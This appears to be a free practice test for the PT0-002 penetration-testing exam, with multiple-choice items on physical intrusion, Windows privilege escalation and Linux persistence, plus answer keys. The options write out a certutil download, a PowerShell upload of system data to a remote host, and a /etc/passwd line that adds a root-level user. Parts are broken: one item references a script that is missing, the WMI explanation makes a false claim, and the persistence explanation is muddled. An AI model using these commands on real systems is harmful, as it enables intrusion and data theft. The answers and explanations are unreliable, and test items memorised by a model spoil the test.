PT0-002 Free Practice Test

A physical penetration tester needs to get inside an organization's office and collect sensitive information without acting suspiciously or being noticed by the security guards. The tester has observed that the company's ticket gate does not scan the badges, and employees leave their badges on the table while going to the restroom. Which of the following techniques can the tester use to gain physical access to the office? (Choose two.)

1. A. Shoulder surfing
2. B. Call spoofing
3. C. Badge stealing
4. D. Tailgating
5. E. Dumpster diving
6. F. Email phishing

Correct Answer: CD

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

1. A. certutil –urlcache –split –f http://192.168.2.124/windows-binaries/ accesschk64.exe
2. B. powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’)
3. C. schtasks /query /fo LIST /v | find /I “Next Run Time:”
4. D. wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe

Correct Answer: A
https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-whil
--- https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk

A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

1. A. Alternate data streams
2. B. PowerShell modules
3. C. MP4 steganography
4. D. PsExec

Correct Answer: B
"Windows Management Instrumentation (WMI) is a subsystem of PowerShell that gives admins access to powerful system monitoring tools."

A penetration tester writes the following script:

Which of the following objectives is the tester attempting to achieve?

1. A. Determine active hosts on the network.
2. B. Set the TTL of ping packets for stealth.
3. C. Fill the ARP table of the networked devices.
4. D. Scan the system on the most used ports.

Correct Answer: A

A penetration tester opened a reverse shell on a Linux web server and successfully escalated privileges to root. During the engagement, the tester noticed that another user logged in frequently as root to perform work tasks. To avoid disrupting this user’s work, which of the following is the BEST option for the penetration tester to maintain root-level persistence on this server during the test?

1. A. Add a web shell to the root of the website.
2. B. Upgrade the reverse shell to a true TTY terminal.
3. C. Add a new user with ID 0 to the /etc/passwd file.
4. D. Change the password of the root user and revert after the test.

Correct Answer: C
The best option for the penetration tester to maintain root-level persistence on this server during the test is to add a new user with ID 0 to the /etc/passwd file. This will allow the penetration tester to use the same user account as the other user, but with root privileges, meaning that it won’t disrupt the other user’s work. This can be done by adding a new line with the username and the numerical user ID 0 to the /etc/passwd file. For example, if the username for the other user is “johndoe”, the line to add would be “johndoe:x:0:0:John Doe:/root:/bin/bash”. After the user is added, the penetration tester can use the “su” command to switch to the new user and gain root privileges.